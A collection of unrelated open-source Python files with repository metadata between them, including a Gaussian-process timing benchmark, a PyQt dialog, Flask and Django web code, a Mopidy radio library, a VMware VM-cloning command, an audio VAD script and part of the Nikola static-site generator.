print 'Initial gedi kernel =',kernel
print 'Initial gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
# Run the optimization routine.
p0_gedi = np.log(kernel.pars)
results_gedi = op.minimize(nll_gedi, p0_gedi, jac=grad_nll_gedi)
kernel= gedi.kernel_optimization.new_kernel(kernel,np.exp(results_gedi.x))
print 'Final gedi kernel =',kernel
print 'Final gedi likelihood =',gedi.kernel_likelihood.likelihood(kernel,x,y,yerr)
print
tempo1= time() - start
av.append(tempo1)
temposmulti.append(sum(av) / float(nrep))
print 'temposmult', temposmulti
sleep(sleeptime*i0)
av = []
for _ in range(nrep):
start = time() # Calculation using george
kernelg1 = 15.0**2*george.kernels.ExpSine2Kernel(2/2.0**2,10.0)* \
george.kernels.ExpSquaredKernel(1.0**2)
# You need to compute the GP once before starting the optimization.
gp = george.GP(kernelg1, mean=np.mean(y))
gp.compute(x,yerr)
# Print the initial ln-likelihood.
print 'Initial george kernel', kernelg1
print 'Initial george likelihood', gp.lnlikelihood(y)
# Run the optimization routine.
p0 = gp.kernel.vector
results = op.minimize(nll, p0, jac=grad_nll)
# Update the kernel and print the final log-likelihood.
gp.kernel[:] = results.x
print 'Final george kernel =',gp.kernel
print 'Final george likelihood= ', gp.lnlikelihood(y)
print
tempog1= time() - start
av.append(tempog1)
georgeQP.append(sum(av) / float(nrep))
print 'georgeQP', georgeQP
###########################################################################
sys.stdout = sys.__stdout__
f.close()
sleep(sleeptime*i0)
N = pontos
pl.figure()
pl.loglog(N, temposQP, 'r-')
pl.loglog(N, temposmulti, 'b-o')
pl.loglog(N, georgeQP, 'b--')
pl.xlim(0.9*N[0], 1.1*N[-1])
pl.xlabel('Number of points')
pl.ylabel('Time')
#pl.title('Covariance matrix calculations')
pl.legend(['gedi QP', 'gedi ESS*ES','george ESS*ES'],loc='upper left')
pl.xticks(fontsize = 18);pl.yticks(fontsize=18)
pl.savefig('speedtest_6.png')
#pl.close('all') | mit | -2,779,067,002,796,960,300 | 32.84375 | 92 | 0.598079 | false |
ArtBIT/Droptopus | droptopus/forms.py | 1 | 3409 | import os
import logging
from droptopus import config, settings
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (
QDialog,
QDialogButtonBox,
QFileDialog,
QFormLayout,
QHBoxLayout,
QLabel,
QLineEdit,
QMessageBox,
QPushButton,
)
from PyQt5.QtGui import QPixmap
class EditItemForm(QDialog):
def __init__(self, item, parent=None):
super(EditItemForm, self).__init__(parent)
l1 = QLabel("Name:")
name = QLineEdit()
l2 = QLabel("Description:")
desc = QLineEdit()
l3 = QLabel("Icon:")
icon = QLabel()
btn_icon = QPushButton("...")
btn_icon.setFixedWidth(50)
btn_icon.clicked.connect(self.onChangeIcon)
l4 = QLabel("Target Path:")
path = QLineEdit()
path.setReadOnly(True)
btn_path = QPushButton("...")
btn_path.setFixedWidth(50)
btn_path.clicked.connect(self.onChangePath)
layout = QFormLayout(self)
layout.addRow(l1, name)
layout.addRow(l2, desc)
row = QHBoxLayout()
row.addWidget(icon)
row.addWidget(btn_icon)
layout.addRow(l3, row)
row = QHBoxLayout()
row.addWidget(path)
row.addWidget(btn_path)
layout.addRow(l4, row)
buttons = QDialogButtonBox(
QDialogButtonBox.Ok | QDialogButtonBox.Cancel, Qt.Horizontal, self
)
buttons.accepted.connect(self.accept)
buttons.rejected.connect(self.reject)
layout.addRow(buttons)
self.icon = icon
self.name = name
self.path = path
self.desc = desc
self.loadItem(item)
def loadItem(self, item):
self.icon.setPixmap(
QPixmap(item["icon"]).scaled(
50, 50, Qt.KeepAspectRatio, Qt.SmoothTransformation
)
)
self.name.setText(item["name"])
self.desc.setText(item["desc"])
self.path.setText(item["path"])
self.item = item
def onChangeIcon(self):
icon_filepath, _filter = QFileDialog.getOpenFileName(
self, "Choose Icon", os.path.dirname(self.item["icon"])
)
if icon_filepath:
icon_size = 15
self.icon.setPixmap(
QPixmap(icon_filepath).scaled(
icon_size, icon_size, Qt.KeepAspectRatio, Qt.SmoothTransformation
)
)
self.item["icon"] = icon_filepath
def onChangePath(self):
path = self.item["path"] if len(self.item["path"]) else os.path.expanduser("~")
if self.item["type"] == "dir":
path = QFileDialog.getExistingDirectory(self, "Choose a directory", path)
if path:
self.path.setText(path)
self.item["path"] = path
else:
path, _filter = QFileDialog.getOpenFileName(self, "Open file", path)
if path:
self.path.setText(path)
self.item["path"] = path
def validate(self):
return True
def accept(self):
if not self.validate():
QMessageBox.critical(
self, "Error", "\n".join(self.validation_errors), QMessageBox.Ok
)
return
self.item["name"] = self.name.text()
self.item["desc"] = self.desc.text()
settings.writeItem(self.item)
self.close()
| mit | -2,698,943,702,042,871,000 | 27.889831 | 87 | 0.563802 | false |
nwokeo/supysonic | supysonic/frontend/folder.py | 1 | 3211 | # coding: utf-8
# This file is part of Supysonic.
#
# Supysonic is a Python implementation of the Subsonic server API.
# Copyright (C) 2013 Alban 'spl0k' Féron
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from flask import request, flash, render_template, redirect, url_for, session
import os.path
import uuid
from supysonic.web import app, store
from supysonic.db import Folder
from supysonic.scanner import Scanner
from supysonic.managers.user import UserManager
from supysonic.managers.folder import FolderManager
@app.before_request
def check_admin():
if not request.path.startswith('/folder'):
return
if not UserManager.get(store, session.get('userid'))[1].admin:
return redirect(url_for('index'))
@app.route('/folder')
def folder_index():
return render_template('folders.html', folders = store.find(Folder, Folder.root == True))
@app.route('/folder/add', methods = [ 'GET', 'POST' ])
def add_folder():
if request.method == 'GET':
return render_template('addfolder.html')
error = False
(name, path) = map(request.form.get, [ 'name', 'path' ])
if name in (None, ''):
flash('The name is required.')
error = True
if path in (None, ''):
flash('The path is required.')
error = True
if error:
return render_template('addfolder.html')
ret = FolderManager.add(store, name, path)
if ret != FolderManager.SUCCESS:
flash(FolderManager.error_str(ret))
return render_template('addfolder.html')
flash("Folder '%s' created. You should now run a scan" % name)
return redirect(url_for('folder_index'))
@app.route('/folder/del/<id>')
def del_folder(id):
try:
idid = uuid.UUID(id)
except ValueError:
flash('Invalid folder id')
return redirect(url_for('folder_index'))
ret = FolderManager.delete(store, idid)
if ret != FolderManager.SUCCESS:
flash(FolderManager.error_str(ret))
else:
flash('Deleted folder')
return redirect(url_for('folder_index'))
@app.route('/folder/scan')
@app.route('/folder/scan/<id>')
def scan_folder(id = None):
scanner = Scanner(store)
if id is None:
for folder in store.find(Folder, Folder.root == True):
scanner.scan(folder)
else:
status, folder = FolderManager.get(store, id)
if status != FolderManager.SUCCESS:
flash(FolderManager.error_str(status))
return redirect(url_for('folder_index'))
scanner.scan(folder)
scanner.finish()
added, deleted = scanner.stats()
store.commit()
flash('Added: %i artists, %i albums, %i tracks' % (added[0], added[1], added[2]))
flash('Deleted: %i artists, %i albums, %i tracks' % (deleted[0], deleted[1], deleted[2]))
return redirect(url_for('folder_index'))
| agpl-3.0 | 8,356,012,142,312,733,000 | 29.571429 | 90 | 0.718069 | false |
janusnic/dj-21v | unit_06/mysite/blog/models.py | 1 | 1855 | from django.db import models
import datetime
from django.utils import timezone
from django.utils.encoding import python_2_unicode_compatible
class Category(models.Model):
name = models.CharField(max_length=100)
slug = models.SlugField(max_length=100, unique=True, verbose_name='slug')
description = models.TextField(max_length=4096)
def __str__(self):
return '%s' % (self.name)
class Tag(models.Model):
name = models.CharField(max_length=100, unique=True)
slug = models.SlugField(max_length=100, unique=True, verbose_name='slug')
def __str__(self):
return '%s' % (self.name)
@python_2_unicode_compatible
class Article(models.Model):
ARTICLE_STATUS = (
('D', 'Not Reviewed'),
('P', 'Published'),
('E', 'Expired'),
)
title = models.CharField(max_length=100, unique=True)
slug = models.SlugField(max_length=100, unique=True, verbose_name='slug')
status = models.IntegerField(default=0)
content = models.TextField()
status = models.CharField(max_length=1, choices=ARTICLE_STATUS, default='D')
category = models.ForeignKey(Category, verbose_name="the related category")
tags = models.ManyToManyField(Tag, verbose_name="the related tags", related_name="keyword_set", blank=True)
publish_date = models.DateTimeField(auto_now=True, editable=False, help_text="Please use the following format: <em>YYYY-MM-DD</em>.")
created_date = models.DateTimeField(auto_now_add=True, editable=False)
def was_published_recently(self):
return self.publish_date >= timezone.now() - datetime.timedelta(days=1)
was_published_recently.admin_order_field = 'publish_date'
was_published_recently.boolean = True
was_published_recently.short_description = 'Published recently?'
def __str__(self):
return '%s' % (self.title)
| mit | 8,088,167,505,696,857,000 | 39.326087 | 137 | 0.687871 | false |
tischlda/mopidy-oe1 | mopidy_oe1/library.py | 1 | 5362 | from __future__ import unicode_literals
import logging
import re
from client import OE1Client
from mopidy import backend
from mopidy.models import Ref, Track
logger = logging.getLogger(__name__)
class OE1Uris(object):
ROOT = 'oe1:directory'
LIVE = 'oe1:live'
CAMPUS = 'oe1:campus'
ARCHIVE = 'oe1:archive'
class OE1LibraryProvider(backend.LibraryProvider):
root_directory = Ref.directory(uri=OE1Uris.ROOT, name='OE1')
root = [
Ref.track(uri=OE1Uris.LIVE, name='Live'),
Ref.track(uri=OE1Uris.CAMPUS, name='Campus'),
Ref.directory(uri=OE1Uris.ARCHIVE, name='7 Tage')]
def __init__(self, backend, client=OE1Client()):
super(OE1LibraryProvider, self).__init__(backend)
self.client = client
def browse(self, uri):
try:
library_uri = OE1LibraryUri.parse(uri)
except InvalidOE1Uri, e:
logger.error(e)
return []
if library_uri.uri_type == OE1UriType.ROOT:
return self.root
if library_uri.uri_type == OE1UriType.ARCHIVE:
return self._browse_archive()
if library_uri.uri_type == OE1UriType.ARCHIVE_DAY:
return self._browse_day(library_uri.day_id)
logger.warn('OE1LibraryProvider.browse called with uri '
'that does not support browsing: \'%s\'.' % uri)
return []
def _browse_archive(self):
return [Ref.directory(uri=str(OE1LibraryUri(OE1UriType.ARCHIVE_DAY,
day['id'])),
name=day['label'])
for day in self.client.get_days()]
def _get_track_title(self, item):
return '%s: %s' % (item['time'], item['title'])
def _browse_day(self, day_id):
return [Ref.track(uri=str(OE1LibraryUri(OE1UriType.ARCHIVE_ITEM,
day_id, item['id'])),
name=self._get_track_title(item))
for item in self.client.get_day(day_id)['items']]
def lookup(self, uri):
try:
library_uri = OE1LibraryUri.parse(uri)
except InvalidOE1Uri, e:
logger.error(e)
return []
if library_uri.uri_type == OE1UriType.LIVE:
return [Track(uri=OE1Uris.LIVE, name='Live')]
if library_uri.uri_type == OE1UriType.CAMPUS:
return [Track(uri=OE1Uris.CAMPUS, name='Campus')]
if library_uri.uri_type == OE1UriType.ARCHIVE_DAY:
return self._browse_day(library_uri.day_id)
if library_uri.uri_type == OE1UriType.ARCHIVE_ITEM:
return self._lookup_item(library_uri.day_id, library_uri.item_id)
logger.warn('OE1LibraryProvider.lookup called with uri '
'that does not support lookup: \'%s\'.' % uri)
return []
def _lookup_item(self, day_id, item_id):
item = self.client.get_item(day_id, item_id)
return [Track(uri=str(OE1LibraryUri(OE1UriType.ARCHIVE_ITEM,
day_id, item['id'])),
name=self._get_track_title(item))]
def refresh(self, uri=None):
self.client.refresh()
class OE1LibraryUri(object):
def __init__(self, uri_type, day_id=None, item_id=None):
self.uri_type = uri_type
self.day_id = day_id
self.item_id = item_id
archive_parse_expression = '^' + re.escape(OE1Uris.ARCHIVE) +\
':(?P<day_id>\d{8})(:(?P<item_id>\d+))?$'
archive_parser = re.compile(archive_parse_expression)
@staticmethod
def parse(uri):
if uri == OE1Uris.ROOT:
return OE1LibraryUri(OE1UriType.ROOT)
if uri == OE1Uris.LIVE:
return OE1LibraryUri(OE1UriType.LIVE)
if uri == OE1Uris.CAMPUS:
return OE1LibraryUri(OE1UriType.CAMPUS)
if uri == OE1Uris.ARCHIVE:
return OE1LibraryUri(OE1UriType.ARCHIVE)
matches = OE1LibraryUri.archive_parser.match(uri)
if matches is not None:
day_id = matches.group('day_id')
item_id = matches.group('item_id')
if day_id is not None:
if matches.group('item_id') is not None:
return OE1LibraryUri(OE1UriType.ARCHIVE_ITEM,
day_id, item_id)
return OE1LibraryUri(OE1UriType.ARCHIVE_DAY, day_id)
raise InvalidOE1Uri(uri)
def __str__(self):
if self.uri_type == OE1UriType.ROOT:
return OE1Uris.ROOT
if self.uri_type == OE1UriType.LIVE:
return OE1Uris.LIVE
if self.uri_type == OE1UriType.CAMPUS:
return OE1Uris.CAMPUS
if self.uri_type == OE1UriType.ARCHIVE:
return OE1Uris.ARCHIVE
if self.uri_type == OE1UriType.ARCHIVE_DAY:
return OE1Uris.ARCHIVE + ':' + self.day_id
if self.uri_type == OE1UriType.ARCHIVE_ITEM:
return OE1Uris.ARCHIVE + ':' + self.day_id + ':' + self.item_id
class InvalidOE1Uri(TypeError):
def __init__(self, uri):
super(TypeError, self).__init__(
'The URI is not a valid OE1LibraryUri: \'%s\'.' % uri)
class OE1UriType(object):
ROOT = 0
LIVE = 1
CAMPUS = 2
ARCHIVE = 3
ARCHIVE_DAY = 4
ARCHIVE_ITEM = 5
| apache-2.0 | 2,123,299,529,363,965,000 | 32.304348 | 77 | 0.567326 | false |
D3DeFi/vmcli | lib/modules/clone.py | 1 | 5545 | from pyVmomi import vim
from lib.modules import BaseCommands
from lib.tools import normalize_memory
from lib.tools.argparser import args
from lib.exceptions import VmCLIException
from flavors import load_vm_flavor
class CloneCommands(BaseCommands):
"""clone specific VMware objects, without any further configuration."""
def __init__(self, *args, **kwargs):
super(CloneCommands, self).__init__(*args, **kwargs)
@args('--name', required=True, help='name for a cloned object')
@args('--template', help='template object to use as a source of cloning', map='VM_TEMPLATE')
def execute(self, args):
try:
self.clone_vm(args.name, args.template, args.datacenter, args.folder, args.datastore,
args.cluster, args.resource_pool, args.poweron, args.mem, args.cpu, args.flavor)
except VmCLIException as e:
self.exit(e.message, errno=2)
@args('--flavor', help='flavor to use for a vm cloning')
@args('--datacenter', help='datacenter where to create vm', map='VM_DATACENTER')
@args('--folder', help='folder where to place vm', map='VM_FOLDER')
@args('--datastore', help='datastore where to store vm', map='VM_DATASTORE')
@args('--cluster', help='cluster where to spawn mv', map='VM_CLUSTER')
@args('--resource-pool', help='resource pool, which should be used for vm', map='VM_RESOURCE_POOL')
@args('--mem', help='memory to set for a vm in megabytes', map='VM_MEM')
@args('--cpu', help='cpu count to set for a vm', type=int, map='VM_CPU')
@args('--poweron', help='whether to power on vm after cloning', action='store_true', map='VM_POWERON')
def clone_vm(self, name, template, datacenter=None, folder=None, datastore=None, cluster=None,
resource_pool=None, poweron=None, mem=None, cpu=None, flavor=None):
"""Clones new virtual machine from a template or any other existing machine."""
flavor = load_vm_flavor(flavor)
# TODO: let script fail when user specifies something wrong instead of using vcenter defaults
# E.g.: ./vmcli.py create --folder non-existing will now pick Root folder of vcenter
# load needed variables
self.logger.info('Loading required VMware resources...')
if mem:
mem = normalize_memory(mem)
template = self.get_obj('vm', template)
datacenter = self.get_obj('datacenter', datacenter, default=True)
cluster = self.get_obj('cluster', cluster, default=True)
folder = self.get_obj('folder', folder) or datacenter.vmFolder
resource_pool = self.get_obj('resource_pool', resource_pool) or cluster.resourcePool
# Search first for datastore cluster, then for specific datastore
datastore = datastore or template.datastore[0].info.name
ds = self.get_obj('datastore_cluster', datastore)
ds_type = 'cluster'
if not ds:
ds = self.get_obj('datastore', datastore)
ds_type = 'specific'
if not ds:
self.exit('Neither datastore cluster or specific datastore is matching {}. Exiting...'.format(
datastore))
datastore = ds
if self.get_obj('vm', name):
self.exit('VM with name {} already exists. Exiting...'.format(name))
if not template:
self.exit('Specified template does not exists. Exiting...')
self.logger.info(' * Using datacenter..........{}'.format(datacenter.name))
self.logger.info(' * Using cluster.............{}'.format(cluster.name))
self.logger.info(' * Using folder..............{}'.format(folder.name))
self.logger.info(' * Using datastore...........{}'.format(datastore.name))
self.logger.info(' * Using resource pool.......{}'.format(resource_pool.name))
self.logger.info('Running cloning operation...')
if ds_type == 'cluster':
storagespec = vim.storageDrs.StoragePlacementSpec(
cloneName=name, vm=template, resourcePool=resource_pool, folder=folder, type='clone')
storagespec.cloneSpec = vim.vm.CloneSpec(location=vim.vm.RelocateSpec(pool=resource_pool), powerOn=poweron)
storagespec.cloneSpec.config = vim.vm.ConfigSpec(name=name, memoryMB=mem, numCPUs=cpu, annotation=name)
storagespec.podSelectionSpec = vim.storageDrs.PodSelectionSpec(storagePod=datastore)
storagePlacementResult = self.content.storageResourceManager.RecommendDatastores(storageSpec=storagespec)
try:
# Pick first recommendation as vSphere Client does
drs_key = storagePlacementResult.recommendations[0].key
if not drs_key:
raise ValueError
except ValueError:
self.exit('No storage DRS recommentation provided for cluster {}, exiting...'.format(datastore.name))
task = self.content.storageResourceManager.ApplyStorageDrsRecommendation_Task(drs_key)
self.wait_for_tasks([task])
elif ds_type == 'specific':
relocspec = vim.vm.RelocateSpec(datastore=datastore, pool=resource_pool)
configspec = vim.vm.ConfigSpec(name=name, memoryMB=mem, numCPUs=cpu, annotation=name)
clonespec = vim.vm.CloneSpec(config=configspec, location=relocspec, powerOn=poweron)
task = template.Clone(folder=folder, name=name, spec=clonespec)
self.wait_for_tasks([task])
BaseCommands.register('clone', CloneCommands)
| apache-2.0 | 4,840,499,294,122,685,000 | 52.317308 | 119 | 0.645807 | false |
antoniorohit/xbob.spkrec | xbob/spkrec/script/external_vad_conversion.py | 1 | 2026 | #!bin/python
# vim: set fileencoding=utf-8 :
# Elie Khoury <[email protected]>
# Fri Aug 30 11:44:33 CEST 2013
#
# Copyright (C) 2012-2013 Idiap Research Institute, Martigny, Switzerland
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, version 3 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import bob
import time, imp
import xbob.spkrec.preprocessing
import sys
from .. import utils
import os
def main():
"""Executes the main function"""
input_file_list = sys.argv[1] # The input file list
audio_dir = sys.argv[2] # The Audio directory
vad_dir = sys.argv[3] # The VAD directory
out_dir = sys.argv[4] # The Output directory
# ensure output directory
utils.ensure_dir(out_dir)
# Define the processor and the parameters
m_preprocessor_config = imp.load_source('preprocessor', "config/preprocessing/external.py")
preprocessor = xbob.spkrec.preprocessing.External(m_preprocessor_config)
infile=open(input_file_list)
for filename in infile:
filename = filename.strip()
audio_file = str(os.path.join(audio_dir, filename) + '.sph')
if os.path.exists(audio_file):
out_file = str(os.path.join(out_dir, filename) + '.hdf5')
vad_file = str(os.path.join(vad_dir, filename) + '.vad')
# The VAD file is 5 columns text file
# Column 1: segment number
# Column 3: start time
# Column 5: end time
preprocessor(audio_file, out_file, vad_file)
else:
print("Warning: file does not exist: %s" %audio_file)
if __name__ == "__main__":
main()
| gpl-3.0 | -514,649,792,676,167,900 | 32.213115 | 94 | 0.698421 | false |
masayuko/nikola | nikola/nikola.py | 1 | 95558 | # -*- coding: utf-8 -*-
# Copyright © 2012-2015 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""The main Nikola site object."""
from __future__ import print_function, unicode_literals
import io
from collections import defaultdict
from copy import copy
from pkg_resources import resource_filename
import datetime
import locale
import os
import json
import sys
import natsort
try:
from urlparse import urlparse, urlsplit, urlunsplit, urljoin, unquote
except ImportError:
from urllib.parse import urlparse, urlsplit, urlunsplit, urljoin, unquote # NOQA
try:
import pyphen
except ImportError:
pyphen = None
import dateutil.tz
import logging
import lxml.etree
import lxml.html
import html5lib
from yapsy.PluginManager import PluginManager
from blinker import signal
from .post import Post # NOQA
from . import DEBUG, utils
from .plugin_categories import (
Command,
LateTask,
PageCompiler,
CompilerExtension,
MarkdownExtension,
RestExtension,
Task,
TaskMultiplier,
TemplateSystem,
SignalHandler,
ConfigPlugin,
PostScanner,
)
from .feedutil import FeedUtil
if DEBUG:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.ERROR)
# Default "Read more..." link
DEFAULT_INDEX_READ_MORE_LINK = '<p class="more"><a href="{link}">{read_more}…</a></p>'
DEFAULT_FEED_READ_MORE_LINK = '<p><a href="{link}">{read_more}…</a> ({min_remaining_read})</p>'
# Default pattern for translation files' names
DEFAULT_TRANSLATIONS_PATTERN = '{path}.{lang}.{ext}'
config_changed = utils.config_changed
__all__ = ('Nikola',)
# We store legal values for some setting here. For internal use.
LEGAL_VALUES = {
'COMMENT_SYSTEM': [
'disqus',
'facebook',
'googleplus',
'intensedebate',
'isso',
'livefyre',
'muut',
],
'TRANSLATIONS': {
'ar': 'Arabic',
'az': 'Azerbaijani',
'bg': 'Bulgarian',
'bs': 'Bosnian',
'ca': 'Catalan',
('cs', 'cz'): 'Czech',
'da': 'Danish',
'de': 'German',
('el', '!gr'): 'Greek',
'en': 'English',
'eo': 'Esperanto',
'es': 'Spanish',
'et': 'Estonian',
'eu': 'Basque',
'fa': 'Persian',
'fi': 'Finnish',
'fr': 'French',
'hi': 'Hindi',
'hr': 'Croatian',
'hu': 'Hungarian',
'id': 'Indonesian',
'it': 'Italian',
('ja', '!jp'): 'Japanese',
'ko': 'Korean',
'nb': 'Norwegian Bokmål',
'nl': 'Dutch',
'pa': 'Punjabi',
'pl': 'Polish',
'pt': 'Portuguese',
'pt_br': 'Portuguese (Brazil)',
'ru': 'Russian',
'sk': 'Slovak',
'sl': 'Slovene',
'sr': 'Serbian (Cyrillic)',
'sr_latin': 'Serbian (Latin)',
'sv': 'Swedish',
('tr', '!tr_TR'): 'Turkish',
'ur': 'Urdu',
'uk': 'Ukrainian',
'zh_cn': 'Chinese (Simplified)',
},
'_WINDOWS_LOCALE_GUESSES': {
# TODO incomplete
# some languages may need that the appropiate Microsoft Language Pack be instaled.
"bg": "Bulgarian",
"ca": "Catalan",
"de": "German",
"el": "Greek",
"en": "English",
"eo": "Esperanto",
"es": "Spanish",
"fa": "Farsi", # Persian
"fr": "French",
"hr": "Croatian",
"hu": "Hungarian",
"it": "Italian",
"jp": "Japanese",
"nl": "Dutch",
"pl": "Polish",
"pt_br": "Portuguese_Brazil",
"ru": "Russian",
"sl_si": "Slovenian",
"tr_tr": "Turkish",
"zh_cn": "Chinese_China", # Chinese (Simplified)
},
'_TRANSLATIONS_WITH_COUNTRY_SPECIFIERS': {
# This dict is used in `init` in case of locales that exist with a
# country specifier. If there is no other locale that has the same
# language with a different country, ``nikola init`` (but nobody else!)
# will accept it, warning the user about it.
'zh': 'zh_cn',
},
'RTL_LANGUAGES': ('ar', 'fa', 'ur'),
'COLORBOX_LOCALES': defaultdict(
str,
ar='ar',
bg='bg',
ca='ca',
cs='cs',
cz='cs',
da='da',
de='de',
en='',
es='es',
et='et',
fa='fa',
fi='fi',
fr='fr',
hr='hr',
hu='hu',
id='id',
it='it',
ja='ja',
ko='kr', # kr is South Korea, ko is the Korean language
nb='no',
nl='nl',
pl='pl',
pt='pt-BR', # hope nobody will mind
pt_br='pt-BR',
ru='ru',
sk='sk',
sl='si', # country code is si, language code is sl, colorbox is wrong
sr='sr', # warning: this is serbian in Latin alphabet
sr_latin='sr',
sv='sv',
tr='tr',
uk='uk',
zh_cn='zh-CN'
),
'MOMENTJS_LOCALES': defaultdict(
str,
ar='ar',
az='az',
bg='bg',
bn='bn',
bs='bs',
ca='ca',
cs='cs',
cz='cs',
da='da',
de='de',
el='el',
en='en',
eo='eo',
es='es',
et='et',
eu='eu',
fa='fa',
fi='fi',
fr='fr',
hi='hi',
hr='hr',
hu='hu',
id='id',
it='it',
ja='ja',
ko='ko',
nb='nb',
nl='nl',
pl='pl',
pt='pt',
pt_br='pt-br',
ru='ru',
sk='sk',
sl='sl',
sr='sr-cyrl',
sr_latin='sr',
sv='sv',
tr='tr',
uk='uk',
zh_cn='zh-cn'
),
'PYPHEN_LOCALES': {
'bg': 'bg',
'ca': 'ca',
'cs': 'cs',
'cz': 'cs',
'da': 'da',
'de': 'de',
'el': 'el',
'en': 'en',
'es': 'es',
'et': 'et',
'fr': 'fr',
'hr': 'hr',
'hu': 'hu',
'it': 'it',
'nb': 'nb',
'nl': 'nl',
'pl': 'pl',
'pt': 'pt',
'pt_br': 'pt_BR',
'ru': 'ru',
'sk': 'sk',
'sl': 'sl',
'sr': 'sr',
'sv': 'sv',
'uk': 'uk',
},
}
class Nikola(object):
"""Class that handles site generation.
Takes a site config as argument on creation.
"""
def __init__(self, **config):
"""Setup proper environment for running tasks."""
# Register our own path handlers
self.path_handlers = {
'slug': self.slug_path,
'post_path': self.post_path,
'root': self.root_path,
'filename': self.filename_path,
}
self.strict = False
self.posts = []
self.all_posts = []
self.posts_per_year = defaultdict(list)
self.posts_per_month = defaultdict(list)
self.posts_per_tag = defaultdict(list)
self.posts_per_category = defaultdict(list)
self.tags_per_language = defaultdict(list)
self.post_per_file = {}
self.timeline = []
self.pages = []
self._scanned = False
self._template_system = None
self._THEMES = None
self.debug = DEBUG
self.loghandlers = utils.STDERR_HANDLER # TODO remove on v8
self.colorful = config.pop('__colorful__', False)
self.invariant = config.pop('__invariant__', False)
self.quiet = config.pop('__quiet__', False)
self._doit_config = config.pop('DOIT_CONFIG', {})
self.original_cwd = config.pop('__cwd__', False)
self.configuration_filename = config.pop('__configuration_filename__', False)
self.configured = bool(config)
self.injected_deps = defaultdict(list)
self.rst_transforms = []
self.template_hooks = {
'extra_head': utils.TemplateHookRegistry('extra_head', self),
'body_end': utils.TemplateHookRegistry('body_end', self),
'page_header': utils.TemplateHookRegistry('page_header', self),
'menu': utils.TemplateHookRegistry('menu', self),
'menu_alt': utils.TemplateHookRegistry('menu_alt', self),
'page_footer': utils.TemplateHookRegistry('page_footer', self),
}
# This is the default config
self.config = {
'ANNOTATIONS': False,
'ARCHIVE_PATH': "",
'ARCHIVE_FILENAME': "archive.html",
'ARCHIVES_ARE_INDEXES': False,
'AUTHOR_PATH': 'authors',
'AUTHOR_PAGES_ARE_INDEXES': False,
'AUTHOR_PAGES_DESCRIPTIONS': {},
'AUTHORLIST_MINIMUM_POSTS': 1,
'BLOG_AUTHOR': 'Default Author',
'BLOG_TITLE': 'Default Title',
'BLOG_DESCRIPTION': 'Default Description',
'BODY_END': "",
'CACHE_FOLDER': 'cache',
'CATEGORY_PATH': None, # None means: same as TAG_PATH
'CATEGORY_PAGES_ARE_INDEXES': None, # None means: same as TAG_PAGES_ARE_INDEXES
'CATEGORY_PAGES_DESCRIPTIONS': {},
'CATEGORY_PAGES_TITLES': {},
'CATEGORY_PREFIX': 'cat_',
'CATEGORY_ALLOW_HIERARCHIES': False,
'CATEGORY_OUTPUT_FLAT_HIERARCHY': False,
'CODE_COLOR_SCHEME': 'default',
'COMMENT_SYSTEM': 'disqus',
'COMMENTS_IN_GALLERIES': False,
'COMMENTS_IN_STORIES': False,
'COMPILERS': {
"rest": ('.txt', '.rst'),
"markdown": ('.md', '.mdown', '.markdown'),
"textile": ('.textile',),
"txt2tags": ('.t2t',),
"bbcode": ('.bb',),
"wiki": ('.wiki',),
"ipynb": ('.ipynb',),
"html": ('.html', '.htm')
},
'CONTENT_FOOTER': '',
'CONTENT_FOOTER_FORMATS': {},
'COPY_SOURCES': True,
'CREATE_MONTHLY_ARCHIVE': False,
'CREATE_SINGLE_ARCHIVE': False,
'CREATE_FULL_ARCHIVES': False,
'CREATE_DAILY_ARCHIVE': False,
'DATE_FORMAT': '%Y-%m-%d %H:%M',
'JS_DATE_FORMAT': 'YYYY-MM-DD HH:mm',
'DATE_FANCINESS': 0,
'DEFAULT_LANG': "en",
'DEPLOY_COMMANDS': {'default': []},
'DISABLED_PLUGINS': [],
'EXTRA_PLUGINS_DIRS': [],
'COMMENT_SYSTEM_ID': 'nikolademo',
'ENABLE_AUTHOR_PAGES': True,
'EXTRA_HEAD_DATA': '',
'FAVICONS': (),
'FEED_LENGTH': 10,
'FILE_METADATA_REGEXP': None,
'ADDITIONAL_METADATA': {},
'FILES_FOLDERS': {'files': ''},
'FILTERS': {},
'FORCE_ISO8601': False,
'GALLERY_FOLDERS': {'galleries': 'galleries'},
'GALLERY_SORT_BY_DATE': True,
'GLOBAL_CONTEXT_FILLER': [],
'GZIP_COMMAND': None,
'GZIP_FILES': False,
'GZIP_EXTENSIONS': ('.txt', '.htm', '.html', '.css', '.js', '.json', '.xml'),
'HIDDEN_AUTHORS': [],
'HIDDEN_TAGS': [],
'HIDDEN_CATEGORIES': [],
